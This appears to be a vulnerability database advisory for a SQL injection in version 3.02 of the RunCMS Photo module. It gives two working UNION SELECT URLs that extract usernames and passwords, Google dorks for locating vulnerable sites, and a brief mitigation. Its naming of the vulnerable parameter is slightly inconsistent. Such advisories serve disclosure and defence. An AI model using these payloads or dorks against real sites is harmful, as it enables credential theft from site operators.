vendor:
Photo
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Photo
Affected Version From: 03.02
Affected Version To: 03.02
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
RunCMS Module Photo 3.02 SQL injection
RunCMS Photo Version 3.02 module is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the admin credentials. The vulnerable parameter is 'id' in the URL 'modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*' and 'pass' in the URL 'modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*'. The Dorks used to find vulnerable sites are 'allinurl: "modules/photo/viewcat.php?id"' and 'inurl:photo "powered by runcms"'.
Mitigation:
The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in a SQL query.
